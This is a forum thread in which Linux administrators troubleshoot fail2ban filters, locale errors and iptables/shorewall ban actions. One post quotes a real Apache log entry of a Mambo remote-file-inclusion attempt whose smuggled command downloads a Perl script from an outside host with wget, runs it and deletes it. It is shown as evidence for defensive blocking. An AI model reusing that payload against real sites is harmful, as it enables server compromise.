anyone have some suggestions for my previous post?

----------

## Tanisete

You can maybe add to the regex the final "possible breaking...", but without an ip to ban, it would be dificult.

Anyone has fail2ban working with proftpd? I'm trying to do it without success right now.

Thanks a lot!

----------

## namo

 *ryker wrote:*   

> For instance, I get this in my logs a lot:
> 
> ```
> 
> Mar 10 17:18:01 emsvs1 sshd[26618]: reverse mapping checking getaddrinfo for www.mproduction.dz failed - POSSIBLE BREAKIN ATTEMPT!
> ...

 

Try with 

```
UseDNS no
```

 in /etc/ssh/sshd_config and you should have the numeric IPs appearing in your logs.

----------

## ryker

thanks.  I'll give that a try.

----------

## Tanisete

Only to say, i finally got it working with proftpd and shorewall for banning and unbanning.

Cheers!

----------

## ryker

Yeah, this is a great little script.  I actually have it running on a vserver system that has 4 guest os's on it and it's using shorewall to ban the ip's.  I have fail2ban running on the host os monitoring the ssh logs for the host and all 4 guests.  Works great.

Thanks

----------

## turbito

Hello!!!

Sorry for my english!!   :Rolling Eyes: 

I'm testing fail2ban to use in my servers. After 3 day, is working on suse 9.1 and fail2ban can log the tries to "remote file inclusion" in mambo usin wget to download a perl script.

I Don't like to make manually a list of the ip adresses triying to use my server as irc server usin cat, grep, etc, adding this ip's to a file of blocked host used for my firewall (arno). 

This is an real example from apache log :

81.25.68.146 - - [19/May/2006:17:15:46 +0200] "GET /portal/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.111.211.183/~secilmis/memberz/cmd.txt?&cmd=cd%20/tmp;wget%20http://66.111.211.183/~secilmis/memberz/travma;perl%20travma;rm%20-rf%20travma? HTTP/1.0" 200 340 "-" "Mozilla/5.0"

But sometimes fail2bam detect 3 ip addres: 

-from apache:

aa.bb.cc.dd - - [19/May/2006:19:45:45 +0200] "GET /portal/index.php?option=com_content&task=category&sectionid=3&id=7&Itemid=31 HTTP/1.1" 200 11126 "http://170.210.136.16/" "Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2"

-from fail2ban:

2006-05-19 19:49:22,340 DEBUG: /var/log/apache2/access_log has been modified

2006-05-19 19:49:22,341 DEBUG: /var/log/apache2/access_log

2006-05-19 19:49:22,341 DEBUG: Setting file position to 1100046L for /var/log/apache2/access_log

2006-05-19 19:49:22,342 DEBUG: Found aa.bb.cc.dd

2006-05-19 19:49:22,343 DEBUG: Found 1.8.0.2

2006-05-19 19:49:22,343 DEBUG: Found 1.5.0.2

Where

aa.bb.cc.dd = ip adress of my testing machine.

1.8.0.2 and 1.5.0.2 are version numbers reported by firefox,

Any trick to avoid this?

TIA!!

----------

## alinv

I get a lot o these in fail2ban.log:

 *Quote:*   

> 2006-07-18 20:56:22,295 ERROR: Please check the format and your locale settings.
> 
> 2006-07-18 20:56:22,296 ERROR: time data did not match format:  data=Jul 18 14:44:32  fmt=%b %d %H:%M:%S

 

and I can't figure out what's wrong.

Any ideas?

Thanks,

Alin

----------

## LostControl

 *alinv wrote:*   

> I get a lot o these in fail2ban.log:
> 
>  *Quote:*   2006-07-18 20:56:22,295 ERROR: Please check the format and your locale settings.
> 
> 2006-07-18 20:56:22,296 ERROR: time data did not match format:  data=Jul 18 14:44:32  fmt=%b %d %H:%M:%S 
> ...

 

If your locales are not set to "en_US", could you try this:

```
# LC_ALL="en_US" fail2ban -vv
```

Some daemon do not take care of the locale settings and use "en_US" or "Posix". Some take your locale settings into account and output a localized time pattern.

----------

## Growlizing

Hi, I can't seem to get this to work (using v. 0.6.1 and a slightly modified version of this: iptables as iptables firewall, executed through /etc/init.d/local last in the boot-up process). After having fail2ban running for only a few seconds, my log looks like this:

 *Quote:*   

> 
> 
> 2006-08-05 02:33:32,271 WARNING: Verbose level is 1
> 
> 2006-08-05 02:33:32,278 INFO: Fail2Ban v0.6.1 is running
> ...

 

Does anyone know what I'm doing wrong?

And here is my fail2ban config file.

EDIT:

Seems like this:

 *Quote:*   

> 
> 
> iptables -I INPUT -p tcp --dport 25 12000 -j fail2ban-SSH' failed
> 
> 

 

part is what creates all the troubles, but how can I make it drop two ports?

I'll have a go at something I'm thinking of...

Will be back with results..

EDIT 2:

Hehe, *Solved*.

Put this line at the bottom of my [SSHD] section:

 *Quote:*   

> 
> 
> fwstart = iptables -N fail2ban-%(__name__)s
> 
>           iptables -A fail2ban-%(__name__)s -j RETURN
> ...

 

At least no errors occured in the log  :Smile: 

EDIT 3:

Guess I was wrong:

 *Quote:*   

> 
> 
> 2006-08-05 18:40:21,248 WARNING: Verbose level is 1
> 
> 2006-08-05 18:40:21,255 INFO: Fail2Ban v0.6.1 is running
> ...

 

So, can anyone help me on this?  :Smile: 

----------

## LostControl

Hi,

 *Growlizing wrote:*   

> So, can anyone help me on this? 

 

In order to set multiport in iptables rules, you must have

```
CONFIG_NETFILTER_XT_MATCH_MULTIPORT=y
```

in your kernel.

I suggest you try the commands manually. First run the command in fwstart, look if everything went fine. Then run the command in fwban. You will get better error messages about the problem.

----------

## bluni

I receive the following error in my /var/log/fail2ban.log file:

```

2006-08-10 20:15:01,663 WARNING: Verbose level is 1

2006-08-10 20:15:01,664 INFO: Fail2Ban v0.6.1 is running

2006-08-10 20:15:01,671 WARNING:  is not a valid IP address

```

Is this due to a regex failure? I use metalog.

Thanks,

Brian

----------

## bluni

nevermind, that must be a common log entry for the time it starts up.

Sorry to bother.

Brian

----------

## LostControl

Hi,

 *bluni wrote:*   

> I receive the following error in my /var/log/fail2ban.log file:
> 
> ```
> 
> 2006-08-10 20:15:01,663 WARNING: Verbose level is 1
> ...

 

Nothing is wrong here  :Very Happy:  You probably have the "ignoreip" option empty.

----------

## LostControl

Hi,

I'm (almost) completly rewritting Fail2ban. Since the end of August, the first 0.7.x releases are available. There is a lots of new features since 0.6.1. I suggest you look at those links:

http://fail2ban.sourceforge.net/wiki/index.php/Features#Roadmap

http://fail2ban.sourceforge.net/wiki/index.php/HOWTO_fail2ban_0.7.x

Ebuilds are available here or here.

I would really appreciate some feedbacks  :Wink: 

----------

## novazur

I don't understand how to use the lastest version with shorewall.

And I don't find how to make fail2ban restart when restarting shorewall.

And, finally, I don't understand why, when I restart fail2ban, it bans again an ip that was unbanned :

```
18:32:53 root@serveur1 /etc/fail2ban # fail2ban-client status ssh-iptables

Status for the jail: ssh-iptables

|- filter

|  |- Currently failed:         0

|  `- Total failed:             15

`- action

   |- Currently banned:         0

   `- Total banned:             2

18:33:12 root@serveur1 /etc/fail2ban # /etc/init.d/fail2ban restart

 * Stopping fail2ban ...                                                                                                         [ ok ]

 * Starting fail2ban ...                                                                                                         [ ok ]

18:33:23 root@serveur1 /etc/fail2ban # fail2ban-client status ssh-iptables

Status for the jail: ssh-iptables

|- filter

|  |- Currently failed:         0

|  `- Total failed:             6

`- action

   |- Currently banned:         1

   `- Total banned:             1
```

PS : sorry for my poor english.

----------

## LostControl

Hi,

Sorry for the late reply  :Sad: 

 *novazur wrote:*   

> I don't understand how to use the lastest version with shorewall.
> 
> And I don't find how to make fail2ban restart when restarting shorewall.

 

I added a shorewall script in the Subversion repository. Will be in 0.7.4. Fail2ban should recreate the chain automatically if they disappeared. However, a bug was found in <= 0.7.3. This should work again with the next release.

 *novazur wrote:*   

> And, finally, I don't understand why, when I restart fail2ban, it bans again an ip that was unbanned

 

When you start Fail2ban, it looks a bit more back than "bantime". Thus, it is possible to see unbanned host being banned again. This can be adjust.

 *novazur wrote:*   

> PS : sorry for my poor english.

 

Mine is probably worst  :Wink: 

----------

## BlackB1rd

 *Tanisete wrote:*   

> Only to say, i finally got it working with proftpd and shorewall for banning and unbanning.
> 
> Cheers!

 

Can you post the regex for proftpd? Thanks.

----------

## gotaserena

I upgraded to version 0.7.X and now fail2ban is failing to ban! (no pun intended)

fail2ban-regex gives sucess to the usual sshd.log line, sshd action is turned "true" in jail.conf and it is calling the iptables action (which I have not edited).

I don't know what to do. Is there an error list check I have to go through or should I downgrade to 0.6.X?

TIA

----------

## c4

gotaserena, I experienced something similar when trying fail2ban 0.72 earlier, something like a month ago. I found that fail2ban was not blocking the intruders trying to bruteforce sshd on my server. At the time I did not have the time to find out what was not working, so I just took the easy way out and downgraded back to version 0.6. Then things where working as intended.

So I can confirm that there might be some issues with fail2ban-0.72. Seeing that it is still marked testing in portage and there are not any bug reports in bugzilla regarding 0.7.. perhaps the latest version 0.74 from the fail2ban website might work better.

----------

## gotaserena

Thanks C4 (hei, I've got a Xantia myself!) this is good enough for me. Masked 0.7.2 and I'm happy again with 0.6.1-r1.

----------

## acarstoiu

I just wanted to tell the interested users that I'm successfully using fail2ban-0.7.5 for SSH server protection. The filtering regular expression is

```
failregex = (?:(?:Authentication failure)|(?:Failed password)|(?:[iI](?:llegal|nvalid) user)|(?:Did not receive identification string)|(User)) .*(?:from|FROM) <HOST>(?(1).* not listed in AllowUsers)

```

(in a single line, naturally)

----------

## thoughtform

 *BlackB1rd wrote:*   

>  *Tanisete wrote:*   Only to say, i finally got it working with proftpd and shorewall for banning and unbanning.
> 
> Cheers! 
> 
> Can you post the regex for proftpd? Thanks.

 

I 2nd this request....

----------

## BlackB1rd

 *WanderingStar wrote:*   

>  *BlackB1rd wrote:*    *Tanisete wrote:*   Only to say, i finally got it working with proftpd and shorewall for banning and unbanning.
> 
> Cheers! 
> 
> Can you post the regex for proftpd? Thanks. 
> ...

 

These days the filter for proftpd is included, so I guess you're running an outdated version.

----------

## zendmaster

I thought I'd post my 2 cents to this thread since I had trouble getting fail2ban to work from vsftpd.

Thought I would post how I got it to work since I couldn't find it in these forums.

First I had to go into my kernel configuration and turn on iptables.  That was the easy part.  The hard part was finding a failregex for vsftpd.  I finally found one that worked.  It is:

```

failregex = \[.+\] FAIL LOGIN: Client "(?P<host>\S+)"$

```

Hope this helps others. I should also mention that this is fail2ban-0.6.2-r1

I tried 0.7.6-r1, but I found it would only monitor vsftd and email a warning.  It didn't ban the ip.  The earlier version works to ban the ip.

----------

## ryker

I was wondering if someone could help me with configuring the email that is sent when someone is banned.  Right now, even though I have specified a name and subject, all emails are sent to me as user root and an empty subject.  This is from ssh failures that are banned using shorewall.

I added the following to /etc/fail2ban/jail.conf.

```

[ssh-shorewall]

enabled  = true

filter   = sshd

action   = shorewall

           mail-whois[name="fail2ban",subject="[fail2ban]", dest=myemail@gmail.com]

logpath  = /var/log/messages

bantime  = 600

maxretry = 5
```

What I would like is for the email to say that it came from "fail2ban" and the subject to contain "[fail2ban]".

BTW, I'm just using ssmtp.  This used to work fine with the older versions of fail2ban before all of the config files changed.

Thanks

----------

## tedj

fail2ban-0.8.0-r1 doesn't seem to be working correctly, either.

It starts up, adds the chains such that you can verify via an "iptables -L", but it doesn't seem to obey the confiuration values for bantime and or findtime.

Here's the fail2ban-regex output (consolidated):

 *Quote:*   

> Running tests
> 
> =============
> 
> Use regex file : /etc/fail2ban/filter.d/sshd.conf
> ...

 

Regardless of what is set for the two times, it will never set any filter for pre-existing addresses in the log files. I've tried the default values, I've tried setting values at default * 2 up to 999999999, and now I'm trying the documented (and previously working) negative one.

Here's my relevant jail.conf:

 *Quote:*   

> 
> 
> [DEFAULT]
> 
> # edited the ignore addresses for this forum post
> ...

 

----------

## gr0x0rd

LostControl hasn't posted in this thread in over 3 years so maybe he's not part of the fail2ban dev team anymore... shame.

2 questions... has anyone put together a working configuration using complain.conf that they are willing to share? The only thing I'd like more than receiving an email that someone has been banned is sending that same message to the admin of the source network. Booya.

The second question, I recently ran into a problem where fail2ban would ban an IP, and yet this IP continued to hammer me; I had to ban the whole range to stop the attack. I'm still not sure how this was accomplished, but it would be great to see this capability added to fail2ban.

Thanks so much for this awesome tool, it will have a happy home on all my servers for years to come.

----------

